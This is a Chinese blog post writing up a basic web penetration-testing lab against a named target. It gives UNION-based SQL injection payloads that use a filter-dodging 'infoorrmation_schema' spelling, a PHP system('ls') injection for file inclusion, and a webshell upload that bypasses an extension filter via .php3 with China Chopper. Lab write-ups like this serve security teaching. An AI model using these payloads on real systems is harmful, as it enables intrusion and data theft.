基本的WEB渗透测试

文章目录

  • 实验要求
  • 一、SQL注入
  • 二、File_include(文件包含):
  • 三、File_upload(文件上传):

实验要求

1. 对靶机进行注入攻击获取数据库数据信息(flag{xxx}) 2. 通过文件包含获取敏感数据(某路径下F1a9文件) 3.寻找文件上传点并尝试绕过实现木马上传实现远程控制靶机(获取某文件内容flag{xxxx})

一、SQL注入

1.1 查询当前连接的数据库,输入命令-1’ UNION SELECT 1, database()#。

1.2 查询服务器上所有的数据库,输入命令-1’ UNION SELECT SCHEMA_NAME,SCHEMA_NAME from infoorrmation_schema.SCHEMATA#。

1.3 查询Flag_db数据库具有的表,输入命令-1’ UNION SELECT 1, table_name from infoorrmation_schema.tables where table_schema=‘Flag_db’#。

1.4 查询FlA9_t0b具有的列,输入命令-1’ UNION SELECT 1, column_name FROM infoorrmation_schema.columns WHERE table_name=‘FlA9_t0b’#。

1.5 查询FlA9_t0b中存储的FLAG,输入命令-1’ UNION SELECT fLa9_col,fLa9_col from Flag_db.FlA9_t0b#,得到爆破后的flag。

二、File_include(文件包含):

原理:开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含。开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞;在PHP中经常出现文件包含漏洞;

  1. 打开浏览器网页选项手动配置HTTP代理为127.0.0.1,端口号为8080,如图所示。

2.打开Burp Suite对靶机地址http://112.48.19.44:8002/进行访问完成拦截。

3.当我们点击【Forward】之后,我们将看到这次请求返回的所有数据。

4. 在burpsuite中修改request,并在最后一行加上命令<?php system(‘ls’)?>。

5. 点击“Go”后,得到response,发现“F1a9”文件。

6. 修改访问网址http://112.48.19.44:8002/file=F1a9,爆出flag。

三、File_upload(文件上传):

  1. 创建hhh.php文件,密码设为8888:
  2. 访问靶机,查看代码中发现不允许上传php后缀文件,将hhh.php文件后缀改为php3:
  3. 在靶机上传hhh.php3文件后,检查网页元素,找到文件上传后的地址。
  4. 打开中国菜刀,添加文件网址,密码8888,类别设置为php文件。
  5. 通过菜刀访问网址,找到“f1a9”文件。
  6. 打开f1a9_upload.txt文件得到爆破的flag。

基本的WEB渗透测试相关推荐

  1. Kali Linux Web 渗透测试— 第十二课-websploit

    Kali Linux Web 渗透测试- 第十二课-websploit 文/玄魂 目录 Kali Linux Web 渗透测试- 第十二课-websploit..................... ...

  2. 轻量级Web渗透测试工具jSQL

    轻量级Web渗透测试工具jSQL jSQL是Kali集成的一款轻量级的Web渗透测试工具.最初该工具主要实施SQL注入,后来增加更多的功能,扩展形成一个综合性的Web渗透测试工具.Kali提供的版本较 ...

  3. kali linux 2.0 web 渗透测试 电子书

    原创 2017-05-31 玄魂工作室 玄魂工作室 打起精神,重新开启订阅号的原创文章写作工作,但是需要点时间,请耐心等待. 求资料的同学,没有及时回复的,请再次留言,我会尽快处理.今天分享两本电子书 ...

  4. Kali Linux Web 渗透测试视频教程—第十一课-扫描、sql注入、上传绕过

    Kali Linux Web 渗透测试视频教程-第十一课-扫描.sql注入.上传绕过 文/玄魂 原文链接:http://www.xuanhun521.com/Blog/2014/10/25/kali- ...

  5. Web渗透测试常规套路

    注:文章首发自合天智汇微信公众平台 0x01:本篇文章旨在给小白白们做一次有关web渗透的科普,其中涉及到的套路.工具可能在如今XX狗.XX盾当道的社会已不再适用,但是其中涉及的思想永远不会过时,其中 ...

  6. 软件测试:web渗透测试怎样入门!讲透了...

    一.简介 1.web渗透测试概述 渗透测试:模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法. web渗透测试:只针对web应用的渗透测试 2.常见web安全漏洞 1.输入输出验证不充分 ...

  7. 什么是Web渗透测试

    什么是Web渗透测试 渗透测试( Penetration Test)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节.渗透测试能够直观的让管理人员知道 ...

  8. kali Linux Web 渗透测试视频教程— 第六课 网络扫描-nmap与zmap

    Kali Linux Web 渗透测试视频教程- 第六课 网络扫描-nmap与zmap 文/玄魂 目录 Kali Linux Web 渗透测试视频教程- 第六课 网络扫描-nmap与zmap. 1 N ...

  9. web渗透测试实战-SQLMAP

    一.实验项目名称 web渗透测试实战-SQLMAP 二.实验目的及要求 熟悉SQL注入漏洞原理 熟悉SQLMAP工具使用. 1.获取数据库信息:数据库漏洞.数据库名.数据库版本等 python sql ...

  10. web渗透测试学习路径图

    Web渗透测试学习路线 一.基础知识 1.1 网络协议 <图解http> 1.2 编程语言 python 30 days for python go 1.3 Linux/Bash Over ...

最新文章

  1. 2019手机浏览器排名_浏览器排行榜2019年1月浏览器市场份额排名
  2. 线性回归竟然还有不明白的地方
  3. 基本的Socket通信
  4. 行为设计模式 - 解释器设计模式
  5. 电子工程可以报考二建_二建报考要求是工程类专业怎么办?非工程类专业可以报名吗?...
  6. weiapi2.2 HelpPage自动生成接口说明文档和接口测试功能
  7. 【转载】 C#使用Newtonsoft.Json组件来反序列化字符串为对象
  8. 车辆颜色识别opencv
  9. sourcetree拉取项目时报错,解决两个冲突
  10. 五十岁才考上大学的柳永,半生风流半生坎坷!
  11. 解决Cuda out of memory的一种思路
  12. 图解路由器:这玩意儿能连接全世界的网络?
  13. 一个名牌大学毕业生心酸经历
  14. android studio创建桌面插件widget
  15. Python 定时获取卫星图像做为桌面背景
  16. 检查linux中nginx是否已安装成功,linux服务下安装nginx 系统版本Ubuntu 18.04.4
  17. 重启tomcat命令
  18. 栅格法路径算法C语言,基于地图栅格与QPSO算法结合的机器人路径规划方法与流程...
  19. 京东云linux面板脚本,京东疯狂的joy脚本
  20. 【OpenCV】 外接矩形、最小外接矩形、多边形拟合、外接圆

热门文章

  1. 最坑人的辨色大比拼微信小游戏源码
  2. mysql查询学生成绩语句_SQL查询成绩之精典语句
  3. 小米手机解锁,root
  4. VsCode同步印象笔记
  5. 川师c语言实验报告9,川师c语言实验报告十.doc
  6. 直播视频app源码从零搭建流媒体服务器+obs推流直播
  7. xmpp即时通讯协议的特性---长处和缺点!
  8. 【情商 为什么情商比智商更重要】阅读笔记
  9. 关于DTC诊断故障码的获取与清除(ISO14229系列之14、19服务)
  10. Tomcat6配置参数详解